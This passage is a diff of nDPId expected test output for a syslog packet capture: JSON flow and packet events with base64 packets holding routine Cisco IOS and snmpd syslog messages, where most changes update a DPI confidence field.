-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782514222,"flow_last_seen":1600782514222,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1600782514222,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1600782515213,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1600782515213,"pkt":"qrvMkvyHqrvMTZFeCABFAADsAAoAAP8RSX3AqC2iCtB4X99OAgIA2PlAPDE4OT45MzogUjE6IDxpb3MtbG9nLW1zZz48ZmFjaWxpdHk+TElORVBST1RPPC9mYWNpbGl0eT48c2V2ZXJpdHk+NTwvc2V2ZXJpdHk+PG1zZy1pZD5VUERPV048L21zZy1pZD48dGltZT4qU2VwIDIyIDEzOjQ4OjM0LjIwMDwvdGltZT48YXJncz48YXJnIGlkPSIwIj5Mb29wYmFjazE8L2FyZz48YXJnIGlkPSIxIj51cDwvYXJnPjwvYXJncz48L2lvcy1sb2ctbXNnPg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1600782647886,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1600782647886,"pkt":"qrvMj6IeqrvMSxtwCABFAADnAAsAAP8R5RQK4CuVrBfzWd9OAgIA0\/DmPDE4OT45NDogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5TWVM8L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPkNPTkZJR19JPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo1MDo0Ni43Nzc8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+Y29uc29sZTwvYXJnPjxhcmcgaWQ9IjEiPmNvbnNvbGU8L2FyZz48L2FyZ3M+PC9pb3MtbG9nLW1zZz4="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600782647886,"flow_last_seen":1600782647886,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1600782647886,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1600782652384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1600782652384,"pkt":"qrvMj6IeqrvMSxtwCABFAADoAAwAAP8R5RIK4CuVrBfzWd9OAgIA1N5pPDE4OT45NTogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5MSU5FUFJPVE88L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPlVQRE9XTjwvbXNnLWlkPjx0aW1lPipTZXAgMjIgMTM6NTA6NTEuNzUyPC90aW1lPjxhcmdzPjxhcmcgaWQ9IjAiPkxvb3BiYWNrMjwvYXJnPjxhcmcgaWQ9IjEiPnVwPC9hcmc+PC9hcmdzPjwvaW9zLWxvZy1tc2c+"} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1600782653380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1600782653380,"pkt":"qrvMj6IeqrvMSxtwCABFAADnAA0AAP8R5RIK4CuVrBfzWd9OAgIA0\/vrPDE4OT45NjogPGlvcy1sb2ctbXNnPjxmYWNpbGl0eT5TWVM8L2ZhY2lsaXR5PjxzZXZlcml0eT41PC9zZXZlcml0eT48bXNnLWlkPkNPTkZJR19JPC9tc2ctaWQ+PHRpbWU+KlNlcCAyMiAxMzo1MDo1Mi4zMTI8L3RpbWU+PGFyZ3M+PGFyZyBpZD0iMCI+Y29uc29sZTwvYXJnPjxhcmcgaWQ9IjEiPmNvbnNvbGU8L2FyZz48L2FyZ3M+PC9pb3MtbG9nLW1zZz4="} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1600782411853,"flow_last_seen":1600782438439,"flow_idle_time":200000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":989,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"192.168.126.102","dst_ip":"172.19.177.230","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1600782653380,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":52,"packets-processed":49,"total-skipped-flows":0,"total-l4-payload-len":9237,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":0,"total-updates":2,"current-active-flows":3,"total-active-flows":13,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":83,"global_ts_msec":1618744015613} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744015613,"flow_last_seen":1618744015613,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1618744015613,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1618744015613,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1618744015613,"pkt":"AAAAAAAAAAgA5occCABFAABVAABAADwRr+OsGuW+rBdQxAICAgIAQS7mPDMwPnNubXBkWzY5NTZdOiBDb25uZWN0aW9uIGZyb20gVURQOiBbMTI3LjAuMC4xXToyMTMxMSAK"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744015613,"flow_last_seen":1618744015613,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1618744015613,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744015613,"flow_last_seen":1618744015613,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1618744015613,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1618744015638,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1618744015638,"pkt":"AAAAAAAAAAgA5occCABFAABiAABAADwRr9asGuW+rBdQxAICAgIATjrrPDMwPnNubXBkWzY5NTZdOiBSZWNlaXZlZCBTTk1QIHBhY2tldChzKSBmcm9tIFVEUDogWzEyNy4wLjAuMV06MjEzMTEgCg=="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1618744015652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1618744015652,"pkt":"AAAAAAAAAAgA5occCABFAABVAABAADwRr+OsGuW+rBdQxAICAgIAQS7mPDMwPnNubXBkWzY5NTZdOiBDb25uZWN0aW9uIGZyb20gVURQOiBbMTI3LjAuMC4xXToyMTMxMSAK"} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1600782647886,"flow_last_seen":1600782653380,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":610,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1600782647886,"flow_last_seen":1600782653380,"flow_idle_time":200000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":610,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.224.43.149","dst_ip":"172.23.243.89","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1600782466695,"flow_last_seen":1600782501747,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"10.22.179.215","dst_ip":"172.26.54.76","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"syslog.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1600782514222,"flow_last_seen":1600782515213,"flow_idle_time":200000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1618744015724,"l3_proto":"ip4","src_ip":"192.168.45.162","dst_ip":"10.208.120.95","src_port":57166,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744117704,"flow_last_seen":1618744117704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1618744117704,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1618744117704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1618744117704,"pkt":"AAAAAAAAAAcAAAAGgQAF4ggARQAAQEPOQAA\/BnudCrp1wqkuUqLDHMvNLulY1AAAAACwAv\/\/r2sAAAIEBbQBAwMFAQEICgVJ71MAAAAABAIAAA=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1618744118712,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1618744118712,"pkt":"AAAAAAAAAAcAAAAGgQAF4ggARQAAQEydQAA\/BnLOCrp1wqkuUqLDHMvNLulY1AAAAACwAv\/\/q4MAAAIEBbQBAwMFAQEICgVJ8zsAAAAABAIAAA=="} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1618744119704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1618744119704,"pkt":"AAAAAAAAAAcAAAAGgQAF4ggARQAAQKarQAA\/BhjACrp1wqkuUqLDHMvNLulY1AAAAACwAv\/\/p5sAAAIEBbQBAwMFAQEICgVJ9yMAAAAABAIAAA=="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1618744117704,"flow_last_seen":1618744129233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1618744129233,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1618744015613,"flow_last_seen":1618744046789,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1618744314014,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"syslog.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1618744117704,"flow_last_seen":1618744129233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1618744129233,"l3_proto":"ip4","src_ip":"10.186.117.194","dst_ip":"169.46.82.162","src_port":49948,"dst_port":52173,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1618744015613,"flow_last_seen":1618744046789,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1618744314014,"l3_proto":"ip4","src_ip":"172.26.229.190","dst_ip":"172.23.80.196","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1618744358191,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1618744358191,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1618744358191,"pkt":"AAAAAAAAAAgA5occCABF4ACnOuMAAP4RubfAqP6dxPBClMHLAgIAk0yqPDEzND4gMjAyMS0wNC0xOCAxNToxMjozOCswNDowMCAxMC4xMjYuMjAuNjggTG9nLCAgICAgNjU5MzQsMC8zLzAvMCwyMjQuMi4yLjIzMSwxLDIwMjEtMDQtMTggMTM6MTI6MzgsMjAyMS0wNC0xOCAxNToxMjozOCxQUk9HUkFNLTEzMSwqLDExLA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1618744358191,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"syslog.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744358191,"flow_last_seen":1618744358191,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1618744358191,"l3_proto":"ip4","src_ip":"192.168.254.157","dst_ip":"196.240.66.148","src_port":49611,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":84,"packets-processed":81,"total-skipped-flows":0,"total-l4-payload-len":10756,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":2,"current-active-flows":2,"total-active-flows":16,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":101,"global_ts_msec":1639052948178} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1639052948178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":761,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":761,"pkt_l4_len":671,"thread_ts_msec":1639052948178,"pkt":"AAAAAAAAAAQAAAAIgQABmAgARQACs1yXAAA\/EY\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"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"syslog.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639052948178,"flow_last_seen":1639052948178,"flow_idle_time":200000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1639052948178,"l3_proto":"ip4","src_ip":"10.11.105.154","dst_ip":"10.6.15.11","src_port":20627,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": 